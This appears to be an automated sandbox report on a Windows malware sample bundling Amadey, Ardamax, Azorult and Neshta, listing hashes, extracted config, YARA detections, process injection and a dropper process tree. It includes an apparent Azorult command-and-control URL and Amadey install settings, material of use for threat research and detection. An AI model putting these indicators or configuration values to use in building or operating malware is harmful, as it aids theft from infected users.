amadey | 06faa5e61d3a3fc1e22b02ef6e2045e8f95e209190a98810b486f49bcf1bd1ad

Analysis

max time kernel
158s
max time network
166s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
26-10-2023 01:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
Size

4.0MB
MD5

0dbaff61a0d7eb35c23542fe980c8e30
SHA1

a65bce229a1f0143c6f5c86a205da15d74652335
SHA256

0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594
SHA512

d59cc95efbb06b98b32ab0f52596aad4cf8b72a2390cddee8237301ee284995421fe98aff13a967db34d49759feaeac51f76e23d4d49397ef81fb003075adfc7
SSDEEP

49152:5hkVUncRtu1kPxXzEgDH/0nl0efk6e4Ath5+hY7hYKJ+NFK2Z0N/eEDNIGuWFlva:qxJDhlEF0N/e06Wrghxt

Score

10^/10

amadey ardamax azorult neshta infostealer keylogger persistence spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

2.03

Attributes

install_dir
3101f8f780
install_file
gbudn.exe
strings_key
98efc0765f4c223e79368db4c8650353

rc4.plain

Extracted

Family

azorult

http://benchadcrd.nl/gate.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Ardamax
A keylogger first seen in 2013.
keylogger stealer ardamax

Ardamax main executable 1 IoCs

resource	yara_rule
behavioral2/files/0x0006000000022f3c-3815.dat	family_ardamax

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/memory/3264-868-0x0000000000C60000-0x0000000000C7A000-memory.dmp	disable_win_def

Detect Neshta payload 7 IoCs

resource	yara_rule
behavioral2/files/0x0008000000022ce0-629.dat	family_neshta
behavioral2/files/0x0008000000022ce0-673.dat	family_neshta
behavioral2/memory/2780-807-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/files/0x0004000000009f64-1628.dat	family_neshta
behavioral2/memory/2780-1733-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/2780-1957-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/6480-2026-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta

Executes dropped EXE 18 IoCs

pid	Process
4664	01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257.exe.exe
2780	0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe.exe
1832	03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0.exe.exe
4504	0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe.exe
4512	0468127a19daf4c7bc41015c5640fe1f.exe.exe
2804	05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83.exe.exe
3476	07529fae9e74be81fd302d022603d9f0796b4b9120b0d6131f75d41b979bbca5.exe.exe
2184	084a220ba90622cc223b93f32130e9f2d072679f66d1816775bf14832d492b8a.exe.exe
1524	08fd696873ed9df967a991fb397fe11e54a4367c81c6660575e1413b440c3af2.exe.exe
4488	0cfc34fa76228b1afc7ce63e284a23ce1cd2927e6159b9dea9702ad9cb2a6300.exe.exe
3404	0dc2ab0ccf783fb39028326a7e8b0ba4eaa148020ec05fc26313ef2bf70f700f.exe.exe
2012	0d7d4dc173c88c4f72c8f9f419ae8473d044f4b3e8f32e4a0f34fe4bbc698776.exe.exe
4168	0eb038e7e5edd6ac1b4eee8dd1c51b6d94da24d02ba705e7e7f10b41edf701c2.exe.exe
576	1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe.exe
3996	1002.exe.exe
2332	1003.exe.exe
3800	1215584b4fa69130799f6cf5efe467f380dc68b14ed2c76f63ca6b461ad57246.exe.exe
5032	131.exe.exe

UPX packed file 19 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000022cf0-655.dat	upx
behavioral2/files/0x0006000000022cf7-687.dat	upx
behavioral2/memory/2760-690-0x0000000000400000-0x000000000042D000-memory.dmp	upx
behavioral2/memory/576-694-0x0000000000070000-0x00000000002FE000-memory.dmp	upx
behavioral2/memory/1652-709-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral2/files/0x0006000000022d00-708.dat	upx
behavioral2/files/0x0006000000022cf7-735.dat	upx
behavioral2/memory/3380-787-0x0000000000400000-0x0000000000467000-memory.dmp	upx
behavioral2/files/0x0007000000022d00-833.dat	upx
behavioral2/memory/1652-799-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral2/memory/576-869-0x0000000000070000-0x00000000002FE000-memory.dmp	upx
behavioral2/memory/2760-875-0x0000000000400000-0x000000000042D000-memory.dmp	upx
behavioral2/memory/2144-1406-0x0000000000400000-0x000000000041F000-memory.dmp	upx
behavioral2/memory/5308-1890-0x0000000000400000-0x0000000000486000-memory.dmp	upx
behavioral2/memory/5308-1894-0x0000000000400000-0x0000000000486000-memory.dmp	upx
behavioral2/memory/5308-1821-0x0000000000400000-0x0000000000486000-memory.dmp	upx
behavioral2/memory/3380-1895-0x0000000000400000-0x0000000000467000-memory.dmp	upx
behavioral2/memory/3380-2508-0x0000000000400000-0x0000000000467000-memory.dmp	upx
behavioral2/memory/5308-2349-0x0000000000400000-0x0000000000486000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
68	checkip.dyndns.org

Program crash 9 IoCs

pid	pid_target	Process	procid_target
4948	3204	WerFault.exe	129
3832	2744	WerFault.exe	124
2664	2760	WerFault.exe	117
6620	2760	WerFault.exe	117
5532	3204	WerFault.exe	129
5168	2744	WerFault.exe	124
6260	5704	WerFault.exe	191
780	3956	WerFault.exe	426
6816	8988	WerFault.exe	444

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/memory/576-869-0x0000000000070000-0x00000000002FE000-memory.dmp	autoit_exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1536	sc.exe
1564	sc.exe
6068	sc.exe
5552	sc.exe

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral2/files/0x0006000000022cf6-679.dat	nsis_installer_2
behavioral2/files/0x0006000000022cf6-734.dat	nsis_installer_2
behavioral2/files/0x0006000000022ebc-3010.dat	nsis_installer_1
behavioral2/files/0x0006000000022ebc-3010.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
6052	schtasks.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
2824	taskkill.exe
7004	taskkill.exe
4428	taskkill.exe
2040	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 3416 wrote to memory of 4664	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	96
PID 3416 wrote to memory of 4664	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	96
PID 3416 wrote to memory of 4664	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	96
PID 3416 wrote to memory of 2780	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	97
PID 3416 wrote to memory of 2780	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	97
PID 3416 wrote to memory of 2780	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	97
PID 3416 wrote to memory of 1832	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	98
PID 3416 wrote to memory of 1832	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	98
PID 3416 wrote to memory of 1832	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	98
PID 3416 wrote to memory of 4504	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	99
PID 3416 wrote to memory of 4504	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	99
PID 3416 wrote to memory of 4504	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	99
PID 3416 wrote to memory of 4512	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	100
PID 3416 wrote to memory of 4512	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	100
PID 3416 wrote to memory of 4512	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	100
PID 3416 wrote to memory of 2804	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	101
PID 3416 wrote to memory of 2804	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	101
PID 3416 wrote to memory of 2804	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	101
PID 3416 wrote to memory of 3476	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	102
PID 3416 wrote to memory of 3476	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	102
PID 3416 wrote to memory of 3476	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	102
PID 3416 wrote to memory of 2184	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	103
PID 3416 wrote to memory of 2184	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	103
PID 3416 wrote to memory of 2184	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	103
PID 3416 wrote to memory of 1524	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	105
PID 3416 wrote to memory of 1524	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	105
PID 3416 wrote to memory of 1524	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	105
PID 3416 wrote to memory of 4488	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	104
PID 3416 wrote to memory of 4488	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	104
PID 3416 wrote to memory of 4488	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	104
PID 3416 wrote to memory of 2012	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	106
PID 3416 wrote to memory of 2012	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	106
PID 3416 wrote to memory of 3404	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	107
PID 3416 wrote to memory of 3404	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	107
PID 3416 wrote to memory of 3404	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	107
PID 3416 wrote to memory of 4168	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	109
PID 3416 wrote to memory of 4168	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	109
PID 3416 wrote to memory of 4168	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	109
PID 3416 wrote to memory of 576	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	110
PID 3416 wrote to memory of 576	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	110
PID 3416 wrote to memory of 576	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	110
PID 3416 wrote to memory of 3996	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	111
PID 3416 wrote to memory of 3996	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	111
PID 3416 wrote to memory of 2332	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	112
PID 3416 wrote to memory of 2332	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	112
PID 3416 wrote to memory of 3800	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	113
PID 3416 wrote to memory of 3800	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	113
PID 3416 wrote to memory of 3800	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	113
PID 3416 wrote to memory of 5032	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	114
PID 3416 wrote to memory of 5032	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	114
PID 3416 wrote to memory of 5032	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	114
PID 3416 wrote to memory of 4960	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	115
PID 3416 wrote to memory of 4960	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	115
PID 3416 wrote to memory of 4960	3416	0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe	115

C:\Users\Admin\AppData\Local\Temp\0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe
"C:\Users\Admin\AppData\Local\Temp\0771ddc1515150cf7bb2eaed7ce17db58bf1f3f963ec60b28e29266763c92594.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3416
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:4664
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:2780
- - C:\Users\Admin\AppData\Local\Temp\3582-490\0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\3582-490\0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe.exe"
    3⤵
    PID:6500
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Public\Video\frame.exe"
      4⤵
      PID:6112
    - - C:\Users\Public\Video\frame.exe
        
        C:\Users\Public\Video\frame.exe
        5⤵
        
        PID:5584
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Public\Video\lphsi.exe"
        6⤵
        
        PID:5232
        
        C:\Users\Public\Video\lphsi.exe
        
        C:\Users\Public\Video\lphsi.exe
        7⤵
        
        PID:4316
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Public\Video\hrss.exe"
        6⤵
        
        PID:5848
  - - C:\Program Files\VideoLAN\VLC\vlc.exe
      "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Public\Video\movie.mp4"
      4⤵
      PID:5484
